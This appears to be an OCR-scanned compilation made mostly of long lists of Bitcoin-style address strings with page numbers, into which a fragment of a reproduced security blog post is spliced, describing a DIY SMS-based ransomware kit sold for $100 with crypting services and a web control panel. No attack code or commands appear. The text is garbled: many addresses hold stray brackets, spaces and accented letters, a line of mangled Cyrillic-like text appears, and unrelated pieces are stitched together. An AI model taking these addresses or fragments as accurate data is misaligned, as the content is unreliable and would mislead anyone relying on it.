1LK8iT3YyGhPemyCECDKxKL1XEmYFWbfqXp 
1K8MKuMxeX5Mp7iEVEc8feLVHhfqyYGuP4s 
LK8qCTqVH3GxfYUZngyRAvRtPvyg8Z9cTC 
LK8RtYK799Wi9tu22z7cPSygSFsWSmggax 
1K8SU3KUNhAaaPoYmf4bB8GszLUf8xuTCL 
1K8Ts7mu9vydYfogh3nvskjGNgqyCcyS7g 
1K8WaKmzigUaW4in54ifoyuaxbLyBBzmLn 
1K8xAxN7TJLwWfFTW9mKrQLdqwyskaUQdKg 
1K8yrrgjHgolh1Dmz7BLj9hFVhLwxGm1Ly 
1K94xLhCK97hjgdWsy5PWwvVJPVytRHSfLU 
1K98rwQDPNgFFtNUoVs6RdX4eMgq5DiQvQ 
25648 


1K99foq4FHNX7CDR2cRMZFXzUq3z7D6Ruv 
1K9Bc1YpF97Q5FGJ7jYqtGvAZhamfKF56F 
1KOBLQYdtMbLBf2GWVnehU36ZoyranL2S6 
1LKOBvxNyD2j5FccU8GoF65i80Lmiad21iF 
1K9jv1FkDrFBQM9e2tv7LX2rkEdCLpkMkN 
1K9kKD5LVHHZWLJHdtHvvLYjxX9G2mbY3d1V 
1LKOLVxHEfaS5AM2W5MbBSqv3xXzZelJj45M 
1LKOPYBGDXAXK71V9QBjoxcpWkxLPt3fhxy 
1K9UAt3Dd6uwNZusiYHw2Mfq5yfRSEEACu 
LKOWULKitjalfvWRNFgAajgUUnERKGONMg 
1K9xKB1ZMSZA2RY3bHFNExVr858eUWNtfD 
1K9YEaVr1VqUXh9k68TZ0GQ4sPTqmVvQ]pd 
1Ka4JNX4GfZ97cBb5FNeqoWoobVUzXLn7h 
1KA4PKUZoL6JBdhmrumUeLK8hW9cGNk9C8 
1KA4XuV69YNG3xwovBGsQcRqLeGeZiViQe 
1Ka6PU6iIKGEwSaQx5Eu3EYGn2H6GyRqtve 
1KA7vd68wgxwYPjkfDX16J89vaeq6hu9UT 
1Ka7YG4PHFJvwZYKBVB1jzwp95nX5bcXVM 
1KA91ZvZ8s6pseteEWKA5kKPM7CM1a2xbre 
1Kac7P29KSNKZoPVYRjiq(D6DSo6WsMbxna 
1KaErlq8wcWe68fpPZTSXeZHSNWBSPY44n 
1KAgxvtiCPgFNu7Rn5ja8vrwLZESJYtHQ4 
1KaJSLBdXmEB3kmayeszKZJYDPa2bn1n5x 
LKAJURdL6dTUp2cM4fS8gmhUEnNU5LN2gqD 
1lKakhs7DVtuBm19KgeJ6TfdjyZ4NWwjVK6 
1LKaL5hmQ8apJWP67WhsjJ1685cdtQjerc5w 
1KaMjz77c8MYToPfaPaxLt3gpvTFfzYBxE 
LKANLrBFSIN95yNDit6gq7g6qBy8vfnyh4 
1KAokczrEs4o0k4SWMpv42KxrwQEFEYNL1o 
LKApcQK6nXwwPn3T2sJA5nVM9OZHTYJUFUY 
1KaPe4MRGYSCjBNz2ZNYEFUPzZDYXzC116g 
LKApiQznqWewG87b4JV]fcd7 7jAMNR9QG56 
1LKAq94FoHrviyYqiHPAVgzFvonSioZNU60 
LKAR5hgdMnd3feopNCFrAdP2unkEYV5trk 
1KarHM9eLhGjNAxN28dP6EHPG6CoVHPG4C 
25649 


1KaT2J89B6SYJyZLsiu4lobDbdZxHx4EWE 
1KaU4HmyUbzNafbaeLQVPv6ksQtJT28jkV 
1KAZEoxWaFxposwsUEn5D4Kdkg4crhiB51 
1LKAzpVxwgWThJYPnmCqi6xAP4bUWEDJLn5 
1Kb2WHQhtEeWgLoH2PxekLMTJ4sLP6RgP9 
1Kb371JtWcUENVa5udAU63LCoTPongkWez 
1LKb5SRPA8myEdTAyF3m4ZRfiSnkjqtunz6 
1KB5UtGeBR4Nrb8kfbvprLhG99mEXBnPoW 
1KB5xDeJdfed4oWkjxW9LgQEweCNLVmtAu 
1Kb8CggogGZEaLzbwd1Sg2MWoiswYwsmEB 
1LKB9wWVDxiDofMPUuGEmPjnM2eYyZBGz7HnB 
LKBbUHpiS4YGKPGN5yq42LT8E8rjJ92z24y} 
LKBcNd2VJjS64t82PUYNyDZTis3KgSPaDR 
1KbcR5grmcf9HRPuYd48WP2D6ajJdmf6ei8 
1KBDR2bpe8gFXJ3cowTnUEALMHJJe5T2Fd 
LKBjkUjQHyaEuYKSSbdkncfQhW6cpcVzxF 
LKBksTATk7ZVyaa58CNvrV3HFDDc4VmPu4 
LKbDNbifGK44rAeYFmSQuUjrmse9EF2PxEr 
1KbnhSof6wXZT9BUky5DpGzMtsJrKkBGEv 
1KborEhLmdpZmkieCe6c7YtbaSYBKjb5cW 
1KbpsAsy3kzQrQJfMRDjat78Jind3xCv84 
1Kbq21V6mxPgumbR5RLMRogJgFrJXNnt9TK 
1KbqS2UT8bGGb19iZSxzFPdpdnLjEctUQ5 
1KBtPv1sStJn8FvABXqnUgLpCLrWwVDQ2C 
1KbuSGEZ1TEGL1PvXTRSriaaDxqyBSbSL 
1LKBXELTdHFiArdySCZ9UFW55BLkrcmSyBD 
1Kbxu2kEx4ye64VpVtwcBn2h4VwLT641v5 
1KbXX2ZdgS58XfVJu2T6ghreMtkQgqVKPx 
1LKBXY6ydcwey4J4YNcXJuYcyJJUFDapy6U 
1LKBy62hiGJFtTyjHDtofhAXCSUKdXZbQvM 
1KBztyAqfQotr707kiDKqsKwcvrrDdcSow 
1KC4LrEoML3xYCgNU8ExzEUMW2PzFXFsmn 
1Kc7jYwSGVesSF2GUxZKMn1uP5NWUtnhec 
1LKC98VKX882jaggPL8q99Se3ggqGLGcQ4u 
1KcaoNzr3nRKPj4zlaoSSbb1DAt58kHTz 
25650 


1Kcb2u1BEnKikhdvebwtfWoixm1GBKARZh 
1KcB70oAnSWWxCKsQyrTHSReLAzR4iuhANG 
1KcCWoyq7YzBXsgoiEenXS7EtksmYFrEqb 
1KcDXuSDYDbgWZ4dJnqYpG4H7GtUeYy7hH 
1KcfhU6ASi8geYsi9t7_LkFbjwd4q2gbzc} 
1LKCFrGrn5Ph7LJHWHY1Lsd1fADtV4RCJiY 
1KcG30lgyHv2uhwcE5LdnoVENLn2gxyLN1 
1KcJ79kckRthX7Sn7W9CSAqtu3ZQunNDtS 
LKCNKnfCJSqkmzcCSQSVywaLug9iCQs5yY 
1KCqbtp51hSU25MZD1PWe8P8xpbQM4LXva 
1KCRgDbDcETbsbf5UZ73D83SV740U5egnn 
1LKCRJXC34dkZ2Zh961fiIN8E9uxjksq6khP 
1KcRWgogiMLWT39P48jinlXAvVHWMZxizxm 
1KcSuupEkyJR2jRJHx7Gru3qBk8RNsc6g5 
1KctbLJRyXkDriFcv6Gne8RPGvAyp4CFr4 
1KctoXFvpMSPkdxn5BTrYJCrLJ DEUFDky2 
1KCv2xba2WxBHmXDfx197Ab6vEdw2vc96Y 
1KcW7nD3cSfAWA8otTS75JplQgyulucieKk 
1LKcwFwjd1LCA81WkD9u9LqwafZgDDZbmxY 
1KCyMC6Ji7prMedC5eUaqjiltpQ7a4KgmP 
1KcZZ2Mi7cVSHSZzZC7t98qksUcxi9sJvcK 
1Kd7jE3yx6zLyAo2kxXroYHADUuZMVcejoyk 
1KD7kPAdtHWdAy9kvSvm8wyCPwqTe4sjgY 
1KdacnHnnX5TMW8Bdcbaa31leBqDvmLv3A1 
1KdAoxjAZi5aPwuHa7yR9wdja7wE4QTzqS 
1KdcD1laAUyPTZ2rneb478tHAL9OPLHrifmF 
1Kdf7BhpMyzY9n3pHeaDQmbi5XbnnpA5wZ 
1Kdfc2N9WxxkLmrLoddvocNUutHuRDV2Q6 
1LKdfDMjqUcrdL6nHP3atmPULhjtjiNa29p 
1KDGhLuuqboRy3F2Ydn9a7MewT8b4He7vx 
1LKdgjECWvFRjir5N4SJ3sbVnnVoZGWR9dE 
1KdgQFqPgzwm6 TwSXHyTdUQJG7DQeUQUin 
1KdhUAwgbcfykSWG8L1uUEnNRkZDSpyvkTOQf 
1LKDix6ynufRCwotEClsjVnj4p6KvkmhAMt 
1KDJJbdoqkvxUTS7SEqGS81o0ABrhZqUwyi 


25651 


1KdKfeZe3)JYSL7Vj2SVATONNSKATUJF4iF 
1KDKUbsc6cyEm3gWHaMhVvRuCQ2CZR9toF 
1KDKyn6qqRiWy34LHakgvhhkXFBfqcGcrn 
1KDLmZPEyp5taZ31XtfDnGkRMNVZRBh5NH 
1KdmYuqT5psGNq31s2tsQDzreyaW6Ts8tj 
1Kdus8GnnSUqU7j4bhkbWFZNksMgJzwRji 
1KDUWo9UH8XF861iIASIPFQC6xz247VWAVV 
1KDVb1X06As9fBz3T3aP8ixDWSUZFnNKHXN 
1KDXeMn497NFe7cuZZYhkvp77H9IGDSMvYU 
LKDYHb4ABzrosNvCRUZxWrsADiKCx3ViQp 
1KdZcxs8eU8YKM6CjRayqFgp3fxUgiUYnV 
1KdZN8NsDZVpo1CnHaV1FnLuhQG6ZEVLic 
1KDzVQrNqW3LshzyzMP9L5CLYTjsetCQQL 
1LKE13QMANMCTn14VjWCwNfQobP86SeVH6 
1Ke3xZmuCSodrQyTSVoij6L5aJEVjfqhDd 
1Ke6k3HeDWm7WRQyYBCuq1XBLMpPuASE1i 
1LKEBPda7tJFNPah4hNvm1737Qq7qJ/KVMmh 
LKECXriT7aeyxiDoKQ3yQv5LYnjLAgRJF) 
1KeEF2jx4bTMGRgbYZsGkzHRudH2r501Dh 
LKEFFJHKByT4KRX9AUNCSKMkpsshRqPhZQ 
LKEGvrz3NSWM54VAPPLkpqleL36ywLbEBw 
1LKehEQk7H5Xcjsn3PeeMehAN8tTry2bzgY 
1KeHwFcyFJVNUCoXzkuVvbqWpWE226tkQF 
1KeiLNPgpjBK7Fz5wzr6WdeBrx7CruBBeC 
LKEIWiIP7YrWZcyULJgxwxa4FcZ6vzeyafd 
1KeKPLfpRXPZHU2Beh2vkdBkwQrNqUU20W 
1KeKxTLAjJeCKW9HhvgmhAZWBeoN64e3g99 
1Keo407CWaN8FEoURR3RaFD8fsBQWeQ6X4 
1LKeRMMrxCZmQSfg6nApCjex8qTLxjly1KG 
LKEUhYU1wndg5s3J17XasW5hCFamokEn9H 
1KeUTLE5XKr7Rd6geNKSFoj3GDMs6YwwxK 
LKeUWMbzZ9AkvgAQJ9E38rJEekLxrHA9nfB 
1KEux82kEYq1lbuHejKbxBoTWdAMTN7Nuit 
LKEwhQGté6tALzzeWNta4UdF21DRi5fac9V 
1LKf2feCF8impkUFNSLYqF5fBQpNKRQkAQS 
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the very latest indication of the micro-payment monetization channel trend. 


Botos onnann: 196 of onan: 29 ocero: 225 A mahoeety, Anmamene ypa rep! 


Onratnt Go me 


The DIY ransomware is offered for sale at $100, with the typical "value-added" services in 
the form of managed undetected binaries through crypting. Since the command and control 
interface is web based (php+mysql), the author is actively experimenting with new features 
such as scheduled appearing of the ads, inventory of banners and affiliate program links, and 
the ability to use multiple SMS numbers next to multiple unlocking codes. 


Are the currently active ransomware "vendors" trendsetters or are they still in experi- 
mental mode? 


The business model of SMS-based ransomware is clearly lucrative, especially in situa- 
tions where cybercriminals are known to combine two or three different monetization 
tactics. However, compared to the [4]high profit-margins which cybecriminals earn through 
the scareware business model, SMS-based ransomware remains a developing market segment. 


Related posts: 

[5]6th SMS Ransomware Variant Offered for Sale 

[6]5th SMS Ransomware Variant Offered for Sale 

[7]4th SMS Ransomware Variant Offered for Sale 

[8]3rd SMS Ransomware Variant Offered for Sale 

[9]SMS Ransomware Source Code Now Offered for Sale 

[10]New ransomware locks PCs, demands premium SMS for removal 
[11]Who’s Behind the GPcode Ransomware? 

[12]ldentifying the Gpcode Ransomware Author 


This post has been reproduced from [13]Dancho Danchev’s blog. 


1. http: //ddanchev. blogspot .com/2008/06/whos-behind- gpcode-ransomware .htm 
2. http: //www.symantec.com/connect/blogs/browsers-and-ransoms 
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1LKF485kxTUVVxcTnyr7wKJnqkMWp6p8bu2 
1Kf4iKkKbJnfcDAYTJJv6B6ct9gTB2UK3V 
1KF5JHePcsKkpj6pFpzlAKEvh4yW2yLirB 
1Kf7omMHkK4sMR7eDrRspMC8Y82ZTvV1sh42 
1Kf8TGRRTfCfy63YeF7ZVt3rmsveTbFLxY 
LKF9QQyoiARNNLjozRG3zmrauUDLkobCé8i 
1KfAGWW6hdDhgFgDyT8SV8VxSFkrp1d7kS 
1KfAMBHkKKTOMTBLQW6ON9VrtS5pjuBowoN 
1KFbcjN3D8sNtEUNPQxgp2dbYhrpHwJVGk 
LKFBj3sMcJUxiM7TpDnVq9nZPdUuyfVWeu 
1LKFBLxxR1g8y5CtbrjvBVkDkjLfxz3teMi 
LKFBWfbwb3Tp9cuV1KfBe6d9YxxX4nV5sT 
1LKfFCjYxxCFSHCKLKM7bqvhthoxkS3SVq6P 
LKFDhtZYsYLpNyRfsu53q7vghFJFZUM8RV 
1KfDSnJVSWdEtAVh7Fa91m8g3UHrgerSDF 
1KF(UWHBhGRYxBHwyqtXgruVA7yhWaPmWG 
1KfDVfFZBpwhxX8X5QpB3exgVnNNUZsvK7nNY 
1LKfFKLAMbVHdZhjJhEencGx4We4rRvpuCoh 
1LKFG4kis9spnRfi3UAGrzHRWdtSbocroFR 
1KfKhfmUteurwPQMHbThb86R6xSu1x6kUj 
1LKFkknJpJYMyG73nvHuaHYcduUyVod8xiL 
1LKFL3QkaVayPH209bzzNuJ8FtmmJUBujJLp 
1KfLaZLnGyLopNDF6MiMb6JvUsRtF88rnj 
LKFLbNJFFHVBxdhQNkTn6yGohbB8B14e3v 
1LKfPMBkYoVQA6CFjg1Nu9Qzvq4Wo9pcAA6 
1KFpNsPBEB6ekMZaLnR3vhVGibfEnZgCrv 
1KFqey6J9ONP2vvUCpgEuvk22iFysVqCSPt 
1KFRRbngRYBTzPPsaSEqqVMCgwZNEzgjJZi 
LKFTBk7j4Xz1qjL7389XrP9EghjJLKz2uQi 
LKFUAFyictvTJPycZfzxw9woUXFVfxXuhnx 
LKFVWhnFrmWPcnjVZFVWKfcGhzwyNMuUFw 
LKFwwz4qLBjpLjN8i7AqfSLvc8iwup)wB 
1LKfY1pzLRHDPHzGjzqHyfrkmy3Z2Z4ifew 
1LKfywNAKCPsK1Rb6nHFpg1xqdX51x59ZQZ 
1KfzuMBewix7JW7JgvYuHdiZiWh5RGcuNZ 
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1Kg49EDarEwuMbJ 7NZNLYUZgFQ5qPxoNTw 
1KG7Giav1zm790WEkt8clofoQrruP2hUBW 
1KGaf26gHPJMLgKpvRiQalXwrWYaYv9Zi5 
1KGaHYNDUeyERSdMLYxnrHQ6gDLLPqZizu 
1KgByndgLSZMAymem73acjktzz9XAQyG7U 
1LKGDAnuRLiFh7GDKu8xh8tcXAvH3hsuyAs 
LKGFKMtT3WvdRP1b2cWcChHeFsciAQuRDc 
1KgG6TGptjN6tb5HTDBCZ8YGcueeeP5AzS 
1KGH8E8FagLx8Se2jQnzKUsHrDQSBQF Doz 
LKgHRHjVn3pFMBSFXYXon2Fan2Nim5Yrab 
1KGi2yEhGGgRMneptzhB7RNazqgnf34UhR 
LKgjMFn7BiPV676aUhKeoRSmc9Pw9YTpYV 
1KGJQg12xLvZzVxXqmkZSpLjcejrHHvTdP 
LKGKVhbM5EXHQ16UvEgW705R4jKgJ8zZ5m 
1KGkzSVaW2VFbb39dwUgozAc89VvdKzqDr 
LKGNuWilvktLNGmPjPatV7UMHdvmi9L2wy 
1KgoMm9zQ9uL65qT9tBVaTkbDRPL3UVWSk 
1KGsQFDUaLuDMyn855Rxttu3UdLf2Goy8P 
1Kgtkvs8h7M9Y46QcFLkeGxbk75gUNcCoBX 
1KGtLGjm3HcSeC4oHHJ9G3p2k8H8xGbmBf 
1KguxByVuz47xoQMpuknRQSAZY5c2U8DUc 
1KgvpDDQnjQXykMP1wg4RqNMLipbWUgMG} 
1KgvvDbLUuerwM3JNiMJxDcdcB6e05evxXc 
L1KgWqkEeFMFuUa58rzE1zR1cR3xbfNLsdQ 
1KgxaKFcPPon1GUkqcrstfVDhAYd5h5Nzi 
1KgXQvYvbhbVhq7F8AZoyQHHsZyzNBAeYr 
LKgYVzc2siTZ4z1Bj 7fVQHjSoszfFr8Vns 
LKH4CV1jeJRmMiIACgCnZTN4wsgg9eRVjiwq 
1Kh4quemdTvvWix2dFGBmVMDcmpHEd8WmkK 
1KH5cGqgs81ZqGovyrRPz8GHGmQmEd7ity 
LKh63UMWYQ4iIAGDRszogcyHmif]fRaHGCy 
1LKh7PJTtp35igYots3MDBiIQNNeFSu4ZmuUi 
1KhAaxC2VTHg2iG1T98XqRLLeQg43yk8tw 
1KHB1T89jBPGseWDb7DFug5jLktspRkasc 
1KhBFZQsoSGvwPMfBRvEkWSDiLhGx9gKZn 
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LKHBzBXzx82yqRp4nt9rd6aLtCxXZFv93v 
LKHCB8MzyCé6AT94swfMgqnjwssCA4vERdUn 
1KHcJ2e7UaWPg1liim7WyfaNQvpmmoCxXvxw 
LKhgUNNDcKFmCAgNFSPdiUk3ceKKEkzo8y 
1Khi9rsZkKc5VaWe]JpEttLpKozdptRH1Vt 
1LKhJHwofADScF5k9jRehHZTkrSCErFBLaV 
LKHk7cQtoE4WbzXdyXZEwR25hzzLjghunp 
1LKhK9XAh8TykKARLHwcp7Qh62TkqRABFmzD 
1KhkSmurAYrsWLB8yFnbZcyY3)JGKLixcswg 


LKHMdQzwSyxY3MADDKvSBmyHnSBhWXHbL7 


1LKhntkAkB4axngPf]cQAfVTe7yDkKCkobSN 
1KHp2rGDRBHEdTDdTudnuwoeA7gTNsneZW 
1LKHpxLSUQU 7MN7MLddgpNS9XWR7m9xqx3}J 
1KhqdPSoAwXUojXWZB1HU9AjpEG4dAGf3u 
LKHQWQtRW85vn8GvKKxjYCk9zuc4rozykf 
1KHr4j9UQyjTGLbEk9pjPSsdFLD7wXGa3x 
1KHrnJyakskuoBgQT3svpHeMzQJ8tv2ZnY 
1KHSoYapmUZjz5NpH8rB8RtGho5pEebwpk 
1LKHtJBftw7zmKVmMAZZwYWPD2YnzFugVKbx 
LKhtjtZ9kQWGUu8rdm8U6znksCpzjDcDXxi 
1KHWcz7Flm8v6vj4jyF9Y5CZhQB61q5FeD 
LKhYxWq9r9EVkiLnLqd1wPACi6xeCaNf8C 
1LKi2kKWicxj5KS1TT 7wjMLjjkEAXtvfrzu 
1Ki2YLDeoAcewDDYYdWh7pESgPpgU6krgk 
1KiB7npNCCYzZokB1KEMajgC5H1lwsHw6DVS 
1KidPvazjc6sSLEM2b3WWMxw3tbGC2kvXFt 
1KiecC87fBkbUVSpxT 2ibLbBao8ucTDehW 
1KiHt3BaM2SBt5SM9baddQ8JBNbLc1Zea6 
1KiJiDFptxgogXb6éiMfvsQ3bdfaZrUXuFs 
1LkiM7f9N4NtyytqQLPTv1BwXpPErttGZh 
LKINW9W1TCGMZRZ6BPsQ10uGN57tEMRc4m 
1KiSQYovmrtDBr1iCSfsWnVVPMxxYY4C778 
1KivvuGEnd9vegYpRmu1UYEI93)Yi8cc}7 
1Kiy2sYPVDyHuPh6Zu7 7U0GO6MNv3VdgjN 
1Kiz4RuarJW15dVJui59cZuLHxWg3AaFeB 
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1KJ2C3U8PD1va3BuUoxKjk2qbtU1lvthloY 
LKJ2YGVyHBwTDQMEuZgim6NbzPQTyPjLcm 
1KJ4krW5FhKBB3uqQKPyA7BSnZ3wdfkrZy 
1KJaCAzq6v3nyENg7DUDhjLqgP4GZBZrDma 
LkjbjtsnTXbngjSu7hri3TS3YnXaXCMcr 
1kjChGRePEJtKAim4Ebvrc3mwk1QrEq8h 
1LKjCUPG3pVrYLdYbkuB4S4pAaCM8f2FVub 
1Kjfy7zZBX2tCvs7WBghw3KhAhHHn1vAERM 
1KjfymeevdYZf8ovr6XzSxXvCxqpjb6fdzy 
1KJHquZhnePjewaFzbdG7jAeMSr6eT9AN8 
1LKji8VuWdb9jyYCwJ9Ds7yHhkT64uDHahK 
1LKJjiq8aSRJfLcvhnlyegPXQ3U3PRI3HWV 
1KJKc3du5dWTdeE5E2bbTirVZRxPO9DBNhR 
1KJKZKLSW 7JeJFgJPF82PA85LmMxW823dAk 
LKJLVZNXx7kagGuB6Xmmé695ktESUdDywat 
LKjJNL67t2n6h2yYEPEJzcHPmPcVuYug3ek 
1KJRCU6mDD8DkWts1PCYoqPSV55wrucBSm 
LKJRJLIC7Jfh4CNsmL7Sa318ZsNEZVwMs9 
LKJRViPtk6WttXZw9HohPoumvnajeq5Zis 
1LKJSGYc7pDZfBQMS5EfRD3gVQBWynmf9og 
1KJSNkKDopuFZwawZ2fetwxLDHpvprU5jfa 
1KjSoSwGe54TUBzJkLbyPhRykjv8qHLmxC 
1KjwuxX5eQCuCqEdjwInpAWKDpsigJws38D 
LKJYWMj6uUfoFe3G4sj6f8mpfls3S6aC1V 
1Kklapz48P3esS1fUw8]Jb3jscPhvyJ4SiQ 
1Kk1lhp5xuz1lsUhNWUvTsju2WVXJVpPTUY1A 
1LKK2tceN7nqqbVAfGqEd15RCbNYoxo0oMZC 
1LKk4Bi6XQL4LpYmNuzqvXSw1RktVqu53Cz 
LKk6bi9i2 756EXHON38gqinrj4xwDsfisw 
1Kk6sekoyZhpjVXXVE4idycDgEPVeulicd 
1Kk7EDNmT8M5phBdjybgAWvhv966H51LVN 
1KkA3wQUpyV9qZwNL3ufvMcvNh4Vmgnbjn 
LKkKCT6GXYHZZczZP1s22gXUWzVmB433fsC 
1Kkct8757wo5YtnQBeogVZut7C4xaHnNjl 
1KKEaVoHoeLSxYqvppK91sk1zAgTy9CnP2 
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1KkeUbafZT9x66jovtojrmyCZACZNWbRYt 
1KKf6p19BM6UyqbBEav9PWT6pDogef4aKkc 


1KKgcZyAckXMMeLMtvT377NmHeAwwPrCuM 


1KkJm5G1XAnjKBr5fuy2nA1lEH4E7KjJDa9c 
1KKL7HK6zPN7jq93cworxpwfojv3wv8M6e 
1KKo2c6YaennfXn4GnoAXV5JLZLILUIx35 
1Kko8nNuCxd7iMcL6Aa2sTx9ZCtvjsm7DG 
1KkoVUzn6fw9HexaB3A14rw4XsDbCCpbqZ 
LKKPSEjJAWCo2tEjcP 7optHsZ5SpD7NNrvp 
1KKq9GnD94wWnNYgRsqZLUktdXjp3tX9MU 
LKKQFIM39Misgp9J 7oWcr3xuu9nki2ybDb 
LKKQLTKpiJx53Eh7bJquj28rFCTmjX2Max 
1KKRHbWerm2UbCuFWEtnm8G52dsJd2nxfz 
LKKSwsUKxk6WTjaf4M6hkVsoubidQ26xdB 
1KKtnjDd67Eeq7YvfUJJALGwsYRTXLV4S7 
1KkuCTY6JM7eJWrnf4G1WFFVD94hTfBQuF 
1LKkKXF34FbtFiAiaG4Hv5zNJM4KWUpNVgRy 
1LKKYDFx55PgRdGCvZrpL2qMiTdetm4vFy8 
1KkZpu2P78YCwzf6UfNEDhUg3x53DuMDhy 


1KkZU3U4G61MCqTgMVoNaZKcxpD2cVUdKH 


1KkzyRr85d4ESTTZ6WVFR3qqg5Jan9uYRwp 
1KLDFEMNam16UiAMk9ZwU2xNN9Ef8mcppr 
1KLeeNY5vXXsaQDriQiAdG58vDvynabDND 
LKLEQT32uU0Hg1jZRUQRvyKiQWt9moAhvds 
1KLKT4p7HpB1B5PpwccztyZNjcPwxtDKZj 
1KLKvuNiL6GrmnMVGrxSRstMG7HQQt33c6 
1KLRDsmKeMfhpeZbsQrCyZEKHMsrFGM5aF 
1KLsAi3h3MayFHkqmMS1WVj9BGVyqaRj26 
1LKLYeqhAkAPZHTPcgPCUPE9Kv5Hibf4iix 
1LKM2NnuSvmf13FVqaoLLDHadKgV2driqg} 
1Km3BoxUJrF5boxbhtHPVJTVV5jSondhEQ 
1KM4Yb9kwaEGdpVBjBRcQxqENA38PVWiWa 
1Km6g5H1AcvwtGFW9ALKf2WkttykvGNc5t 
1Km6Lubiozfx8TytnQmpPAEASDnCgBeEWb 
1KMaDp3MCHaybQjr5mzHeZvaoVAEarMGMo 
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1KmMC7ktZ9gGxxCrjsHEsvuY8kQmgJAD5xD 
1KmfT76yaXK4708sLQ3VW1QcfRvaqZ7biA 
L1KMHub1QqgeDi7YLnRAdmSfGTx2Qa8LZ76k 
1Kmige23xTJhHaD7tctLvec2f9UrmmgwdU 
1KmJ2V8RAWIT8KotTRZEqxuSN4ks5VCanC 
1KmK4wgyanseaNUN4R1SRFrccVxZmyorhR 
1Kmku9uUQ2ckxwFUnhgPTHdKqiJN57qBRTq 
LKMLOVS9WUAFPZE3hHY7bg37YQkzteiG2eq 
1KMN7paLixoVBQRefPoEq650uckvet9mZn 
1KmoknSU6NCs3tZ7sE6hBydyphLdL52eNm 
1KmRGArs62DCUZBs5fuiNvyNh7iWPnrLhg 
1KmtfzRuYHWwcdSS9W5P5cuGtDtGTGHrhs 
1Kmty41ckXCHbin7Wyr3gS2pagmy8YHSZH 
LKMUECe8phAtFnbF5TsvLYb3Q5]jxAqaSM 
1KmVxgLxhgbxwEfu7ntCmwUCq7Lhe8u90F 
L1KmWMw2LFZCDgkkt9fsYK2f53q6Kfd2wwm 
1KmXLShs5oHG2gvNjpBT9zhpTipcybtPVN 
LKMYNGLTtkBmrr8VtPdoRce68RayvNhE4Y 
1LKMzVn26eDptvHvdFUFGpUTg 7dQZQM9Lnu 
1Kn3PEGNa)xi4rN1FpZnem1pHqY6k3rte5 
LKN3ZpAqkZR81SuCcJWjXexfwHg8PBqKZ7 
LKN42RbA8UZszZFJYpVjaoLkkXN1HJgDftE 
1Kn7ofeHxTj6msGdJgTc6pXuxXXhajJb4Euu 
1LKN7tu6FaFHMH2xcMrWbih23inVqHwhPUg 
LKn9OPHLK3P8rHgpcxXjbsbxa7Y8x6eg1Cyd 
LKnAhP6iUCypS5yQJC2roiwsDodFoD25mN 
LKnNAk9jpZjcYCVYh8hTq6jg8ZcCB9UPXWZ 
1Knaro8pmcQBdH4Zo8EfLCYEWbk3GSx1Fh 
1KNbcHerTEfelMvSH7wyYiiBRePNchuRkv5 
LkKNEkD3XtsApZZA4hNC9MTU5CmuVFrmJSP 
1KnepPq1zj9Df2dLdCtiGVUrid6cAGZVxW 
LKNFCtGjafHrziMCZeoRjCCmZovndjhups 
LKNG5sgHZGLF6pChU46XR3cJEBtHD8uPnq 
1KngcBrv1DYaRDnwrq7VjsD71TL8HMJJAb 
1KnGZH4N2RZUMfqKm6eQ3yxrpPrG2pQETL 
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1KnjXmJFi3CCBXZBY3CUKHwoQcyfiTJJYt 
LKNLa2UbP2H5SGt6dn6TCKxK6qgnwMAJrcD 
1LKnNMQW6fDbYPGTt5tM7arqRXrgpEXXkjME 
1KnnEqDPvaMzcPLUZqueyUkSYszpmijPwf 
1Knpp1wRdRMfCUvXcCMWaWDYDFnhkuVEY5 
LKNRMxnLZ5HRK8QzZhN3A85QNV1h9kKhf2F1 
1KNsJZEYKULFUFm7HHxbLmzyYi8KxhCQmvL 
LKNtNWF5CWNCT78Dk7un870pL60xP28RLZ 
1LKNtsQb3iiJFvHd5PuEycLNM4fNWrjYJmV 
LKNwqCUhp36204rFFPnMdwHWf5FsZuJbjD 
LKNWsbYkxQvuPb8bPQH4AGj8XZZcejFpR4 
1KnxAxjc7ce5xmYHnNYgY5KoON4p7gyi4eC 
LKNXiU3B4MdrcHztjgz4zK1wx5JMav9Vin 
1KNyyz3Ecttojfxu58LMh7ALMfMwUaPvtY 
1lKo2qcTw5vkxhbwlEwMceWaxZxS2vHrMdV 
1Ko5L6ZBtGEDn3g7hh3nf6éNUpHesrvei7P 
1Ko7FdcmJ1nsF8kEpP6gmKFgb91Edryjer 
1KoAN17feyNbrdH6i8MVYGLIMZrKkGDfRS 
1KoBJenBsBcu3hrY4FJ]qvWWdj9CQpc7mT5 
1KoeeDJ9UR7GavEegF81lgaCgyX78U5Wn9k 
1KofeQ2NcR847gCPPhWUW2ztfQQ9uiBXron 
1LKojGzMjiDdUWfAZWEcNnfcLjYyxvriZAQ 
1KokBLBRH9KEHBxNuBviYSaFm7PV5ahJ75 
1KomZ6GtEdbdN7ZtsERrdCZZkqQCM6Sdsw 
1KopgPZsyU7ENHmxXgWj4A01w34AefQRa5M 
LKoYWKFwbf3U77Mj6bnTzxPYaV6ORN2niAw 
1KozCGjedgAgxkamNaXNuTWh4aNojdWu8sD 
1LKp5RixXesViyxEP6qQNzdz2713xkiCmtzfF 
1LKP5SfQUsjRY4dsSoPZEbt8LwHvvWtcSbW 
1KPAmqVWZiiU2Pun9dwbCfwDTRUS5tcFmew 
1KpcU33sWvEuBgLE7V3qZNUeiMuPvXejjc 
1KPe3e2NR6Cjyqwi4fUY8eLfVMrwWL6W7C2 
1KPEO9BBpngN3yCRsqjPWsgDX2RAKNEosis 
1LKPGBtz3iUFoZH17T1h3hM1WrQhxX1ZL9IGG 
LKPHhHqQZ9Yv2yqEU4X666cZCGMso83mia 


25659 


LKpNxNaQyMSfaeRjYoCg81ZgPJ1Cpjj4EH 
LKpoAUKgYSjBgCKXBbSNUK6pWBsxeXoDAh 
LKPOUFWZNnzT8VGzxDA4sEksDRpZEtDxNe 
1Kpoy576SPmkKuiCsEAdFNKnpAV9xdrHQKA 
1KpPz2Q31sfMcZkxnK8V9kPAR7WZf6N6F6 
LKPqtHEXJbTLLZkKWRCK2m8xfVBN9rDKjNe 
1KpqZV4zzroHsCm6g66Ro05XEuQdpCLNSSV 
1KpSHeHRy4Xcr9E629fNSBK9jdfKchJS1o 
1KPuQdcYTRVQU6WOoWUY5BCTqMAdoVwhUK9 
LKpwZWJCJGOVHDNRJiZNxEss49rieJ]GLox 
1KpXUdHnzcEsRtCNtkKCwYhRML6HFLCRxd6 
lKpyhqz2h6ZWGhPAjaluyk8t1BWQ5m4Bq5 
1KpzxWvqfx2NXUEExaDghiCBoSXf9FFVsV 
1KQ1QYN544L6kJ231ZSHAhq8hD7oudfA9W 
